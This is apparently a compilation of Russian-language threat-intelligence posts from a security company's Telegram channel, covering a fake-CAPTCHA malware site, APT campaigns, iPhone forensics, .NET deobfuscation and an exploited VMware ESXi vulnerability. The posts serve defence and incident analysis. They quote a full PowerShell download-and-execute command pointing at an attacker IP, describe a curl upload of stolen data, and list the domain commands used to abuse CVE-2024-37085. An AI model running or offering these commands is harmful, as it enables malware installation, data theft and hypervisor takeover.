Радиолюбителям приготовиться 📻
Внутренние системы группы киберразведки обнаружили взлом сайта для радиолюбителей. Сайт существует с 2017 года и стабильно входит в число первых результатов поиска в Яндексе.
При входе на сайт пользователю сразу же предлагается пройти проверку и доказать, что он не робот. Однако вместо привычного набора задач при клике на кнопку «Я не робот» запускается JavaScript-функция. Она не выполняет проверку, а копирует заранее подготовленный текст в буфер обмена (скриншот 1).
Пользователю предлагается следовать инструкциям: открыть окно «Выполнить» (Win+R) и нажать Ctrl+V, чтобы вставить скопированный текст. При этом в буфер попадает команда:
Из-за ограниченного размера окна «Выполнить» отображается лишь последняя ее часть (скриншот 2):
Это позволяет скрыть от глаз невнимательного пользователя факт выполнения вредоносного кода. Команда запускает PowerShell в скрытом режиме, отключая проверки безопасности, скачивает удаленный ps1-скрипт по указанному URL и сразу его выполняет. Ранее о подобных способах распространения ВПО писали наши коллеги. А недавно схожий инцидент зафиксировал наш SOC (но об этом — в следующих постах).
📸 Скрипт представляет собой примитивный стилер. Вредоносный инструмент скачивается в систему и выполняется для извлечения данных (в числе которых — имя компьютера и пользователя, сведения об операционной системе, процессоре, дисках, а также внутренние и внешние IP-адреса), файлов (документов, таблиц, презентаций, текстовых материалов и изображений, найденных на рабочем столе и в папке «Загрузки»), а также для создания 300 скриншотов экрана с интервалом в 30 секунд. Кроме того, в скрипте присутствуют комментарии на русском языке (скриншот 3).
После сбора информации формируется команда
Скрипт взаимодействует с IP-адресом
IoCs
#TI #ioc
@ptescalator
Внутренние системы группы киберразведки обнаружили взлом сайта для радиолюбителей. Сайт существует с 2017 года и стабильно входит в число первых результатов поиска в Яндексе.
При входе на сайт пользователю сразу же предлагается пройти проверку и доказать, что он не робот. Однако вместо привычного набора задач при клике на кнопку «Я не робот» запускается JavaScript-функция. Она не выполняет проверку, а копирует заранее подготовленный текст в буфер обмена (скриншот 1).
Пользователю предлагается следовать инструкциям: открыть окно «Выполнить» (Win+R) и нажать Ctrl+V, чтобы вставить скопированный текст. При этом в буфер попадает команда:
PowerShell.exe -WindowStyle Hidden -nop -exec bypass -c "iex (New-Object Net.WebClient).DownloadString('http://45.61.157.179/script.ps1') # 'I am not a robot - reCAPTCHA ID: 477237535673 TRUE'"
Из-за ограниченного размера окна «Выполнить» отображается лишь последняя ее часть (скриншот 2):
I am not a robot - reCAPTCHA ID: 477237535673 TRUE
Это позволяет скрыть от глаз невнимательного пользователя факт выполнения вредоносного кода. Команда запускает PowerShell в скрытом режиме, отключая проверки безопасности, скачивает удаленный ps1-скрипт по указанному URL и сразу его выполняет. Ранее о подобных способах распространения ВПО писали наши коллеги. А недавно схожий инцидент зафиксировал наш SOC (но об этом — в следующих постах).
После сбора информации формируется команда
curl, которая посредством POST-запроса HTTP отправляет данные на сервер злоумышленников с адресом http://45.61.157.179/upload.Скрипт взаимодействует с IP-адресом
45.61.157.179 (AS 14956, ROUTERHOSTING, США), где размещен домен eschool-ua.online. На этом сайте находится форма для входа в сервис DrobBox, предположительно функционирующий как командный центр злоумышленников (скриншот 4). На момент написания поста домен уже недоступен.IoCs
45.61.157.179
eschool-ua.online
4bdaa2e9bc6c6986981d039b29085683ed36b5c2549466101a81ad660281465c
#TI #ioc
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🤣20🔥17👍10😱4🤡2❤1⚡1
Forwarded from GigaHackers (Vlad Driev)
[SCCM NTLM Relay]
Всем привет!👋
Недавно была опубликована моя статья про атаки на SCCM. В ней достаточно подробно описан стенд для тестирования, сами атаки и конечно защита от них! Кейс через SCCM достаточно часто встречается в больших инфраструктурах, поэтому рекомендую ознакомиться!
Из интересного:
💬 Компрометация SCCM через TAKEOVER1
💬 Компрометация SCCM через TAKEOVER2
💬 Компрометация SCCM через TAKEOVER5
💬 Повышение привилегий в домене AD через SCCM
💬 Гайд по настройке защиты SCCM
Читать здесь.
Если будут вопросы, пишите в комментариях❔
@GigaHack
#pentest #gigahack #sccm #AD
Всем привет!
Недавно была опубликована моя статья про атаки на SCCM. В ней достаточно подробно описан стенд для тестирования, сами атаки и конечно защита от них! Кейс через SCCM достаточно часто встречается в больших инфраструктурах, поэтому рекомендую ознакомиться!
Из интересного:
Читать здесь.
Если будут вопросы, пишите в комментариях
@GigaHack
#pentest #gigahack #sccm #AD
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍8❤7
Не выбрасывай старый айфон, пока не прочитаешь этот пост (и после тоже) 🚮
Недавно нашему эксперту Виталию, который занимается расследованиями инцидентов с мобильными устройствами, на анализ попал iPhone 5s, на экране которого отображался знакомый многим текст: «iPhone отключен. Подключитесь к iTunes». Это означало, что после 10 неверных попыток ввода пароля устройство заблокировалось. Казалось бы, все данные утеряны, но у Виталия была идея, как их можно извлечь💡
🔑 Используем checkm8
Для доступа к данным он решил воспользоваться аппаратной уязвимостью iPhone, которая присутствует в процессорах A5–A11. Эксплойт checkm8 позволяет загрузить мобильное устройство в режиме BFU (before first unlock) и извлечь оттуда данные.
💰 Какие данные удалось извлечь
С помощью
При анализе эксперт обнаружил:
• Артефакты устройства: модель, версию iOS, серийный номер, IMEI.
• Данные пользователя: номер телефона, информацию о сим-картах, учетных записях, избранных и заблокированных контактах и др.
• Параметры сетевых соединений: список ранее подключенных Wi-Fi-сетей, Bluetooth-устройств, их MAC-адреса.
• Артефакты приложений: данные из незашифрованных баз данных и кэша некоторых приложений.
🎆 Итог
Этот эксперимент показал, что даже заблокированные iPhone хранят ценную информацию, которую можно извлечь при наличии нужных инструментов и знаний. Это еще раз подтверждает важность надежного шифрования и своевременного удаления конфиденциальных данных перед продажей устройства.
С полным текстом проведенного исследования можете ознакомиться в статье на SecurityLab.
#dfir #mobile #ios
@ptescalator
Недавно нашему эксперту Виталию, который занимается расследованиями инцидентов с мобильными устройствами, на анализ попал iPhone 5s, на экране которого отображался знакомый многим текст: «iPhone отключен. Подключитесь к iTunes». Это означало, что после 10 неверных попыток ввода пароля устройство заблокировалось. Казалось бы, все данные утеряны, но у Виталия была идея, как их можно извлечь
Для доступа к данным он решил воспользоваться аппаратной уязвимостью iPhone, которая присутствует в процессорах A5–A11. Эксплойт checkm8 позволяет загрузить мобильное устройство в режиме BFU (before first unlock) и извлечь оттуда данные.
💰 Какие данные удалось извлечь
С помощью
Elcomsoft iOS Forensic Toolkit и UFED 4PC извлек данные из связки ключей (keychain) и файловой системы устройства.При анализе эксперт обнаружил:
• Артефакты устройства: модель, версию iOS, серийный номер, IMEI.
• Данные пользователя: номер телефона, информацию о сим-картах, учетных записях, избранных и заблокированных контактах и др.
• Параметры сетевых соединений: список ранее подключенных Wi-Fi-сетей, Bluetooth-устройств, их MAC-адреса.
• Артефакты приложений: данные из незашифрованных баз данных и кэша некоторых приложений.
Этот эксперимент показал, что даже заблокированные iPhone хранят ценную информацию, которую можно извлечь при наличии нужных инструментов и знаний. Это еще раз подтверждает важность надежного шифрования и своевременного удаления конфиденциальных данных перед продажей устройства.
С полным текстом проведенного исследования можете ознакомиться в статье на SecurityLab.
#dfir #mobile #ios
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥25❤🔥9👍9🆒3👏2❤1⚡1🐳1👾1
Эволюция инструментов Dark Caracal 🐱
В первом квартале 2024 года в поле зрения сотрудников департамента Threat Intelligence экспертного центра безопасности Positive Technologies (PT ESC) попал вредоносный семпл.
Целевой аудиторией атаки стали испаноговорящие пользователи — это понятно по содержимому вредоносных вложений и по языку фишинговых писем, используемых для доставки ВПО. Сообщество назвало вредонос Poco RAT — по наименованию используемых библиотек POCO для C++. На момент обнаружения семпл не был атрибутирован ни к одной известной группировке.
🤨 Исследование семпла выявило определенный набор функций для удаленного управления устройством жертвы, включая загрузку файлов, снятие скриншотов, выполнение команд, управление процессами и файлами.
Дополнительный анализ тактик, техник и процедур, цепочки атак и географии кампании позволил связать активность с группировкой Dark Caracal, известной использованием вредоносного ПО Bandook. При этом была выявлена схожесть дропперов Poco RAT и Bandook.
Подробнее о Dark Caracal, ее методах и новых инструментах вы можете прочитать в исследовании на нашем сайте👽
#TI #APT #malware
@ptescalator
В первом квартале 2024 года в поле зрения сотрудников департамента Threat Intelligence экспертного центра безопасности Positive Technologies (PT ESC) попал вредоносный семпл.
Целевой аудиторией атаки стали испаноговорящие пользователи — это понятно по содержимому вредоносных вложений и по языку фишинговых писем, используемых для доставки ВПО. Сообщество назвало вредонос Poco RAT — по наименованию используемых библиотек POCO для C++. На момент обнаружения семпл не был атрибутирован ни к одной известной группировке.
Дополнительный анализ тактик, техник и процедур, цепочки атак и географии кампании позволил связать активность с группировкой Dark Caracal, известной использованием вредоносного ПО Bandook. При этом была выявлена схожесть дропперов Poco RAT и Bandook.
Подробнее о Dark Caracal, ее методах и новых инструментах вы можете прочитать в исследовании на нашем сайте
#TI #APT #malware
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥20👍9❤8🥱1
С чем предпочитаете блинчики? 🥞
Anonymous Poll
21%
Двухфакторные с творогом и джемом 😋
20%
Фишинговые с рыбкой 🐟
7%
Зашифрованные с сюрпризом 🤷♀️
7%
C cookies 🍪
36%
Со сгущеночной инъекцией 🤩
10%
Троянские — с медом снаружи и мясом внутри 🐽
6%
Уязвимые с острым соусом 🌶
16%
Хешированные нутеллой 🧤
36%
Zero-Day с икрой 🐠
21%
Резервные без начинки 😎
😁20❤8💯6👍1👎1💅1
.NET Reactor: эволюция защиты с 6.7 до 7.0 и методы снятия обфускации 🔄
.NET Reactor — это мощный инструмент для защиты исполняемых файлов, написанных на С#, от декомпиляции и обратного инжиниринга. Он предоставляет различные методы обфускации и лицензирования, обеспечивая безопасность интеллектуальной собственности разработчиков.
Но, как это обычно бывает, применяется он не только в благих целях: экспертам антивирусной лаборатории PT ESC часто попадаются вредоносные файлы, защищенные от анализа именно .Net Reactor.
🔓 Как защищен?
.NET Reactor использует несколько уровней защиты для предотвращения декомпиляции и анализа кода:
• NecroBit IL Code Protection: заменяет CIL-код методов на зашифрованный, делая невозможной декомпиляцию и восстановление исходного кода.
• Виртуализация кода: преобразует исходный код в набор инструкций отличный от .NET IL, которые интерпретируются во время выполнения виртуальной машиной, что затрудняет анализ и восстановление оригинального кода.
• Обфускация потока управления (Control Flow Obfuscation): преобразует код методов в запутанную структуру, усложняя понимание логики программы и затрудняя работу декомпиляторов (пример — на скриншоте 1).
• Шифрование строк (String Encryption): шифрует строки в коде, предотвращая их чтение и анализ, что усложняет понимание функциональности приложения, как показано на скриншоте 2.
• Антиотладочные механизмы (Anti Debug): внедряет проверки на наличие отладчиков, завершая процесс при их обнаружении, что препятствует динамическому анализу приложения.
🆕 Что нового?
• Поддержка .NET 6.0: обеспечивает защиту для новейших приложений на этой платформе.
• Улучшения в виртуализации кода и Control Flow Obfuscation обеспечивают дальнейшее повышение надежности и сложности обфускации.
• Скрытие содержимого объединенных приложений .NET Core, 5.0, 6.0 предотвращает просмотр содержимого с помощью инструментов, таких как ILSpy / dnSpy.
🧐 Как анализировать?
Несмотря на сложность защиты, существуют инструменты, которые облегчают жизнь реверсерам.
NETReactorSlayer — мощный инструмент для реверса приложений, обфусцированных с помощью .NET Reactor. Его главные фишки:
• дешифровка NecroBit — восстанавливает CIL-код из зашифрованных методов;
• удаление прокси и оберток — очищает код от мусора, добавленного обфускатором (смотрите на скриншоте 3);
• декодирование строк и ресурсов — возвращает читаемые строки, зашифрованные в приложении;
• обход антиотладки и защиты от изменения кода.
Однако начиная с версии 6.9 изначальная версия Net Reactor Slayer перестала справляться с деобфускацией защиты даже с базовыми параметрами. Благодаря открытому исходному коду и довольно большому комьюнити, в pull requests можно найти исправленный код, который прекрасно отрабатывает даже на самой свежей версии обфускатора.
Но вот с виртуализированным кодом не все так гладко: Net Reactor Slayer с ним не справляется. Если вам повезло и файл был защищен версией
☝️ Вывод
.NET Reactor остается одним из самых популярных обфускаторов для .NET. С каждой версией защита усложняется, особенно за счет виртуализации. Если собираетесь его анализировать — запасайтесь терпением и хорошими инструментами.
#avlab #sandboxteam #dotnet #obfuscation
@ptescalator
.NET Reactor — это мощный инструмент для защиты исполняемых файлов, написанных на С#, от декомпиляции и обратного инжиниринга. Он предоставляет различные методы обфускации и лицензирования, обеспечивая безопасность интеллектуальной собственности разработчиков.
Но, как это обычно бывает, применяется он не только в благих целях: экспертам антивирусной лаборатории PT ESC часто попадаются вредоносные файлы, защищенные от анализа именно .Net Reactor.
.NET Reactor использует несколько уровней защиты для предотвращения декомпиляции и анализа кода:
• NecroBit IL Code Protection: заменяет CIL-код методов на зашифрованный, делая невозможной декомпиляцию и восстановление исходного кода.
• Виртуализация кода: преобразует исходный код в набор инструкций отличный от .NET IL, которые интерпретируются во время выполнения виртуальной машиной, что затрудняет анализ и восстановление оригинального кода.
• Обфускация потока управления (Control Flow Obfuscation): преобразует код методов в запутанную структуру, усложняя понимание логики программы и затрудняя работу декомпиляторов (пример — на скриншоте 1).
• Шифрование строк (String Encryption): шифрует строки в коде, предотвращая их чтение и анализ, что усложняет понимание функциональности приложения, как показано на скриншоте 2.
• Антиотладочные механизмы (Anti Debug): внедряет проверки на наличие отладчиков, завершая процесс при их обнаружении, что препятствует динамическому анализу приложения.
🆕 Что нового?
• Поддержка .NET 6.0: обеспечивает защиту для новейших приложений на этой платформе.
• Улучшения в виртуализации кода и Control Flow Obfuscation обеспечивают дальнейшее повышение надежности и сложности обфускации.
• Скрытие содержимого объединенных приложений .NET Core, 5.0, 6.0 предотвращает просмотр содержимого с помощью инструментов, таких как ILSpy / dnSpy.
🧐 Как анализировать?
Несмотря на сложность защиты, существуют инструменты, которые облегчают жизнь реверсерам.
NETReactorSlayer — мощный инструмент для реверса приложений, обфусцированных с помощью .NET Reactor. Его главные фишки:
• дешифровка NecroBit — восстанавливает CIL-код из зашифрованных методов;
• удаление прокси и оберток — очищает код от мусора, добавленного обфускатором (смотрите на скриншоте 3);
• декодирование строк и ресурсов — возвращает читаемые строки, зашифрованные в приложении;
• обход антиотладки и защиты от изменения кода.
Однако начиная с версии 6.9 изначальная версия Net Reactor Slayer перестала справляться с деобфускацией защиты даже с базовыми параметрами. Благодаря открытому исходному коду и довольно большому комьюнити, в pull requests можно найти исправленный код, который прекрасно отрабатывает даже на самой свежей версии обфускатора.
Но вот с виртуализированным кодом не все так гладко: Net Reactor Slayer с ним не справляется. Если вам повезло и файл был защищен версией
6.9.0.0, то можно не тратить время на ручной анализ виртуальной машины, а применить VMAttack — инструмент для девиртуализации приложений .NET, в котором есть поддержка этой версии .NET Reactor. А если не повезло — проще всего проанализировать файл по его поведению, например с помощью PT Sandbox..NET Reactor остается одним из самых популярных обфускаторов для .NET. С каждой версией защита усложняется, особенно за счет виртуализации. Если собираетесь его анализировать — запасайтесь терпением и хорошими инструментами.
#avlab #sandboxteam #dotnet #obfuscation
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍19🔥10👏9🆒1
Net group "babyk" /addВ рамках расследования одного из инцидентов мы обнаружили факт эксплуатации уязвимости CVE-2024-37085. Она позволяет злоумышленнику получить полный контроль над гипервизором VMware ESXi, присоединенным к домену
Уязвимость заключается в том, что пользователи, входящие в группу с именем
ESX Admins, по умолчанию имеют максимальные права доступа к гипервизору. Эта группа не существует в домене по умолчанию, поэтому злоумышленнику необходимо завладеть учетной записью, имеющей права на создание группы и добавление в нее пользователей.В статье упоминается эксплуатация этого недостатка операторами шифровальщиков Akira и Black Basta. В публичных отчетах информации об использовании уязвимости в атаках на российские организации нет.
👤 В рассматриваемом нами случае злоумышленникам удалось получить доступ к контроллеру домена и завладеть учетной записью с необходимыми правами. После они создали группу
ESX Admins и добавили в нее пользователя, выполнив следующие команды:net group "ESX Admins" /add /domain
net group "ESX Admins" superuser /add /do
От имени этого пользователя впоследствии нарушители вошли на гипервизор и зашифровали файлы и диски виртуальных машин с применением Babyk.
В обнаружении эксплуатации CVE-2024-37085 могут помочь события журнала Security:
• 4727 — создание группы безопасности Active Directory с именем
ESX Admins;• 4737 — изменение группы безопасности Active Directory (переименование группы в
ESX Admins);• 4728 — добавление пользователя в группу безопасности Active Directory с именем
ESX Admins.Для исправления описанной уязвимости рекомендуется установить последние обновления безопасности для VMware ESXi.
#dfir #cve #detect #win
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥23👍10👏7🆒2❤1😁1🤯1
Desert Dexter — группировка, атакующая жителей арабских государств 👽
Cпециалисты группы киберразведки TI-департамента PT ESC обнаружили вредоносную кампанию, нацеленную на жителей стран Ближнего Востока и Северной Африки, активную с сентября 2024 года.
👾 В качестве ВПО выступает AsyncRAT, использующий модифицированный модуль IdSender, который собирает информацию о наличии в браузерах расширений для двухфакторной аутентификации, расширений криптокошельков, а также о наличии ПО для работы с ними.
Для распространения AsyncRAT злоумышленники создают поддельные новостные группы в социальных сетях и публикуют посты с рекламой. Эти посты содержат ссылки на файлообменник или Telegram-канал, где и располагается вредонос.
🔍 В ходе исследования мы обнаружили около 900 потенциальных жертв, большая часть которых — обычные пользователи.
Подробное изучение инцидентов и пострадавших показало, что наиболее атакуемыми странами являются Египет 🇪🇬, Катар 🇶🇦, Ливия 🇱🇾, ОАЭ 🇦🇪, Саудовская Аравия 🇸🇦 и Турция 🇹🇷. Мы назвали группировку Desert Dexter, в честь одного из подозреваемых.
👤 Мы также выяснили, что злоумышленники создают временные аккаунты и новостные каналы в «лицекниге»* и обходят правила фильтрации рекламы. Подобная атака была описана в 2019 году экспертами Check Point, но сейчас наблюдается изменение некоторых ее техник.
🐃 Подробнее о том, какую цепочку атаки подготовила Desert Dexter, читайте в исследовании на нашем сайте.
*Принадлежит Meta, которая признана экстремистской организацией и запрещена в России.
#TI #APT #malware
@ptescalator
Cпециалисты группы киберразведки TI-департамента PT ESC обнаружили вредоносную кампанию, нацеленную на жителей стран Ближнего Востока и Северной Африки, активную с сентября 2024 года.
👾 В качестве ВПО выступает AsyncRAT, использующий модифицированный модуль IdSender, который собирает информацию о наличии в браузерах расширений для двухфакторной аутентификации, расширений криптокошельков, а также о наличии ПО для работы с ними.
Для распространения AsyncRAT злоумышленники создают поддельные новостные группы в социальных сетях и публикуют посты с рекламой. Эти посты содержат ссылки на файлообменник или Telegram-канал, где и располагается вредонос.
Подробное изучение инцидентов и пострадавших показало, что наиболее атакуемыми странами являются Египет 🇪🇬, Катар 🇶🇦, Ливия 🇱🇾, ОАЭ 🇦🇪, Саудовская Аравия 🇸🇦 и Турция 🇹🇷. Мы назвали группировку Desert Dexter, в честь одного из подозреваемых.
👤 Мы также выяснили, что злоумышленники создают временные аккаунты и новостные каналы в «лицекниге»* и обходят правила фильтрации рекламы. Подобная атака была описана в 2019 году экспертами Check Point, но сейчас наблюдается изменение некоторых ее техник.
🐃 Подробнее о том, какую цепочку атаки подготовила Desert Dexter, читайте в исследовании на нашем сайте.
*Принадлежит Meta, которая признана экстремистской организацией и запрещена в России.
#TI #APT #malware
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥25❤15❤🔥11👍3
1C_shell для «1С» 🦞
Иногда случаются ситуации, когда в ходе расследования инцидента информационной безопасности традиционно используемые артефакты ОС содержат крайне скудную информацию, а делать что-то все-таки надо...
Самым терпеливым и любопытным может помочь связка инструментов для работы с кэшем RDP (который, как известно, хранится в Windows по адресу
Поскольку кэш
Практика показывает, что однозначной закономерности в расположении отдельных фрагментов внутри кэша нет, но, как правило, соседние фрагменты могут располагаться в пределах окна в 20–30 последовательных изображений. Тем не менее полностью автоматизировать «склеивание» этих пазлов — задача нетривиальная.
🔎 Итак, что же любопытного можно обнаружить внутри подобного кэша?
1. Следы внезапно проснувшегося интереса пользователя к разного рода сомнительным инструментам (скриншоты 1, 2);
2. Следы запуска подозрительных файлов с еще более подозрительными параметрами (скриншот 3);
3. Выполнение до боли знакомых команд, которые, казалось бы, простой бухгалтер выполнять не должен (скриншот 4);
4. Нечто крайне подозрительное, интересное (скриншот 5).
При обнаружении такого рода данных следует внимательно изучить соседние фрагменты — там, как правило, можно обнаружить какое-то развитие наметившейся идеи (скриншоты 6, 7, 8).
Вот тут уже возникает повод серьезно задуматься и после раздумий, сопровождаемых поиском следующих фрагментов изображения, прийти к выводам. В данном случае в ходе расследования было обнаружено и подтверждено использование своеобразного шелла 1C_shell для «1С».
Несмотря на то, что механизмы работы подобных «внешних обработок» системы «1С» были уже давно описаны в материале «Взломать за 60 секунд!» и докладе «„1С“ глазами пентестера», а все соответствующие рекомендации сформулированы, схема продолжает работать и по сей день.
#ir #dfir #malware
@ptescalator
Иногда случаются ситуации, когда в ходе расследования инцидента информационной безопасности традиционно используемые артефакты ОС содержат крайне скудную информацию, а делать что-то все-таки надо...
Самым терпеливым и любопытным может помочь связка инструментов для работы с кэшем RDP (который, как известно, хранится в Windows по адресу
C:\Users\%Username%\AppData\Local\Microsoft\Terminal Server Client\Cache), состоящая из парсера кэша bmc-tools и инструмента для «склеивания» фрагментов изображения RdpCacheStitcher. Поскольку кэш
RDP представляет собой набор фрагментов размером максимум 64×64 пикселя, а количество фрагментов составляет обычно несколько тысяч для одного файла кэша, работа по восстановлению и поиску интересных фрагментов достаточно кропотливая, но иногда приносит неожиданные результаты.Практика показывает, что однозначной закономерности в расположении отдельных фрагментов внутри кэша нет, но, как правило, соседние фрагменты могут располагаться в пределах окна в 20–30 последовательных изображений. Тем не менее полностью автоматизировать «склеивание» этих пазлов — задача нетривиальная.
1. Следы внезапно проснувшегося интереса пользователя к разного рода сомнительным инструментам (скриншоты 1, 2);
2. Следы запуска подозрительных файлов с еще более подозрительными параметрами (скриншот 3);
3. Выполнение до боли знакомых команд, которые, казалось бы, простой бухгалтер выполнять не должен (скриншот 4);
4. Нечто крайне подозрительное, интересное (скриншот 5).
При обнаружении такого рода данных следует внимательно изучить соседние фрагменты — там, как правило, можно обнаружить какое-то развитие наметившейся идеи (скриншоты 6, 7, 8).
Вот тут уже возникает повод серьезно задуматься и после раздумий, сопровождаемых поиском следующих фрагментов изображения, прийти к выводам. В данном случае в ходе расследования было обнаружено и подтверждено использование своеобразного шелла 1C_shell для «1С».
Несмотря на то, что механизмы работы подобных «внешних обработок» системы «1С» были уже давно описаны в материале «Взломать за 60 секунд!» и докладе «„1С“ глазами пентестера», а все соответствующие рекомендации сформулированы, схема продолжает работать и по сей день.
#ir #dfir #malware
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥23👍10❤9💯3⚡1🆒1
Кому завтра дарим цветы? 💐
Anonymous Poll
16%
Классической Иде 🌼
5%
Матушке Астре, сестрице Росе и бабушке их Слаке 🌺
9%
Бывшим Аське и Ирке 🌸
1%
Непонятной Ярке 🌻
10%
Верной Клаве 🌹
6%
Фолзовой Сигме 💐
12%
Необходимой MITRE-матрице 🌸
8%
Подружкам Надежной Двухфакторке и Перевыпущенной Симке 💐
8%
Строгой Политике (доменной) 🌼
26%
Забытой Логике 🌷
🗿17❤🔥9❤5🥴4🔥2👏2🤷♀1🤮1
Используете ли вы криптографию правильно? 🔓
Группе исследования сложных угроз департамента Threat Intelligence часто приходится решать интересные задачи в процессе реверса ВПО. Этот раз не стал исключением. Существует такая техника, как Execution Guardrails: Environmental Keying, — она нужна для ограничения выполнения ВПО только в конкретной целевой среде. Например, ее использует группировка Decoy Dog в своих операциях.
В попавшем к нам на исследование семпле применялась эта же техника: в качестве ключа для используемых строк использовалось имя компьютера, которого у нас не было, дополнительно семпл был обфусцирован. В случае, если ВПО запускалось не на нужном злоумышленнику устройстве, оно крашилось — отсюда и стартует наше исследование.
☠️ Выяснилось, что ВПО «падает» при попытке вызова функции
Чтобы вычислить промежуточный ключ (который формируется в результате логических операций), мы прибегнули к атаке на основе открытого текста. Возвращаясь к функции
Группа исследования сложных угроз рекомендует одну из платформ для изучения криптоанализа — cryptohack.org.
#tips #reverse #malware #cryptography #TI
@ptescalator
Группе исследования сложных угроз департамента Threat Intelligence часто приходится решать интересные задачи в процессе реверса ВПО. Этот раз не стал исключением. Существует такая техника, как Execution Guardrails: Environmental Keying, — она нужна для ограничения выполнения ВПО только в конкретной целевой среде. Например, ее использует группировка Decoy Dog в своих операциях.
В попавшем к нам на исследование семпле применялась эта же техника: в качестве ключа для используемых строк использовалось имя компьютера, которого у нас не было, дополнительно семпл был обфусцирован. В случае, если ВПО запускалось не на нужном злоумышленнику устройстве, оно крашилось — отсюда и стартует наше исследование.
LoadLibraryA с переданным именем библиотеки в качестве неотображаемых байтов. Этот набор байтов должен представлять собой имя библиотеки, которая расшифровывается в цикле; при каждой итерации берется символ от имени компьютера, с помощью логических операций приводится в необратимый вид, а после уже гаммируется с зашифрованным текстом и его однобайтовой константой. Чтобы вычислить промежуточный ключ (который формируется в результате логических операций), мы прибегнули к атаке на основе открытого текста. Возвращаясь к функции
LoadLibraryA: мы знаем, что имя библиотеки будет составлять 13 байт в кодировке ASCII + '\x00'; так мы смогли восстановить треть ключа, а далее по аналогии уже с другими строками восстановили оставшуюся часть ключа.Дешифрование строки:
F(sym_comp_name) ^ sym_enc ^ cnst_enc = sym_dec
F(sym_comp_name) — логические операции
Получение промежуточного ключа:
sym_dll_name ^ sym_enc ^ cnst_enc = irr_sym_key
irr_sym_key — промежуточный байт ключа, необратимый
Группа исследования сложных угроз рекомендует одну из платформ для изучения криптоанализа — cryptohack.org.
#tips #reverse #malware #cryptography #TI
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍18❤17🔥12🆒1